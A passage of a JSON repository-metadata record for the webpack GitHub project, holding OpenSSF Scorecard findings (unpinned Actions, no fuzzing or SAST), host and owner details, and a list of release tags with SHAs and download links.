https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":